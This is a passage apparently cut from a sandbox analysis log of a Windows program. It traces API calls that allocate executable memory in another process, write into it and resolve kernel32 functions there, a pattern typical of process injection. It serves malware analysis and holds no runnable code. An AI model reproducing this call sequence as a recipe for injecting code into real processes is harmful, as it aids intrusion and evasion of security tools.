(hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.512] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.512] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.512] lstrlenA (lpString="FlushViewOfFile") returned 15 [0176.512] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.513] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9ef0*, nSize=0x10, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9ef0*, lpNumberOfBytesWritten=0xcd978*=0x10) returned 1 [0176.514] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.514] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cde0 [0176.514] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.515] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cde0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cde0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.515] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.516] ResetEvent (hEvent=0x580) returned 1 [0176.516] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.516] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.516] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.516] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cde0 | out: hHeap=0x2150000) returned 1 [0176.516] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.517] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.517] lstrlenA (lpString="CreateFileA") returned 11 [0176.517] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.517] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f02*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f02*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.519] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.519] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.519] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.519] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cd50*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cd50*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.520] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.521] ResetEvent (hEvent=0x580) returned 1 [0176.521] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.521] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.521] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.522] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.522] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.523] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.525] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.525] lstrlenA (lpString="WaitForSingleObjectEx") returned 21 [0176.525] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.526] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f10*, nSize=0x16, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f10*, lpNumberOfBytesWritten=0xcd978*=0x16) returned 1 [0176.528] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.528] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c510 [0176.528] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.529] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c510*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c510*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.531] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.531] ResetEvent (hEvent=0x580) returned 1 [0176.531] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.532] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.532] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.533] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c510 | out: hHeap=0x2150000) returned 1 [0176.533] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.534] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.534] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.534] lstrlenA (lpString="DeleteFileA") returned 11 [0176.534] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.534] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f28*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f28*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.535] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.535] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ce70 [0176.535] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.536] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6ce70*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6ce70*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.536] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.537] ResetEvent (hEvent=0x580) returned 1 [0176.537] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.537] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.537] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.537] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ce70 | out: hHeap=0x2150000) returned 1 [0176.537] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.538] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.538] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.538] lstrlenA (lpString="DeleteFileW") returned 11 [0176.538] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.538] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f36*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f36*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.539] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c3f0 [0176.540] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.540] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c3f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c3f0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.540] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.541] ResetEvent (hEvent=0x580) returned 1 [0176.541] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.541] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.541] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.541] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c3f0 | out: hHeap=0x2150000) returned 1 [0176.542] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.542] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.542] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.542] lstrlenA (lpString="CloseHandle") returned 11 [0176.542] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.542] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f44*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f44*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.544] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0176.544] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.544] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c360*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c360*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.544] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.545] ResetEvent (hEvent=0x580) returned 1 [0176.545] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.545] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.545] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.546] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0176.546] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.546] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.546] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.546] lstrlenA (lpString="GetSystemInfo") returned 13 [0176.546] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.546] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f52*, nSize=0xe, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f52*, lpNumberOfBytesWritten=0xcd978*=0xe) returned 1 [0176.547] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9c0 [0176.548] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.548] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c9c0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.548] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.549] ResetEvent (hEvent=0x580) returned 1 [0176.549] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.549] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.549] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.549] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9c0 | out: hHeap=0x2150000) returned 1 [0176.549] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.550] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.550] lstrlenA (lpString="LoadLibraryW") returned 12 [0176.550] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.550] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f62*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f62*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.551] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.551] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.552] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.552] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.553] ResetEvent (hEvent=0x580) returned 1 [0176.553] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.553] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.553] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.553] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.553] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.554] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.554] lstrlenA (lpString="HeapCompact") returned 11 [0176.554] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.554] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f72*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f72*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.556] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c8d0 [0176.556] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.556] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c8d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c8d0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.557] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.557] ResetEvent (hEvent=0x580) returned 1 [0176.557] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.558] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.558] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.558] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c8d0 | out: hHeap=0x2150000) returned 1 [0176.558] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.558] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.558] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.558] lstrlenA (lpString="HeapDestroy") returned 11 [0176.558] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.559] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f80*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f80*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.560] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cbd0 [0176.560] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.560] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cbd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cbd0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.561] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.561] ResetEvent (hEvent=0x580) returned 1 [0176.561] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.561] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.561] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.562] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cbd0 | out: hHeap=0x2150000) returned 1 [0176.562] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.562] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.562] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.562] lstrlenA (lpString="UnlockFile") returned 10 [0176.562] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.562] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f8e*, nSize=0xb, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f8e*, lpNumberOfBytesWritten=0xcd978*=0xb) returned 1 [0176.563] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cae0 [0176.564] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.564] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cae0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cae0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.564] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.565] ResetEvent (hEvent=0x580) returned 1 [0176.565] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.566] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.566] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.566] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cae0 | out: hHeap=0x2150000) returned 1 [0176.566] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.566] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.566] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.566] lstrlenA (lpString="LockFileEx") returned 10 [0176.566] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.567] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9f9c*, nSize=0xb, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9f9c*, lpNumberOfBytesWritten=0xcd978*=0xb) returned 1 [0176.568] ReadProcessMemory (in: hProcess=0x5cc, 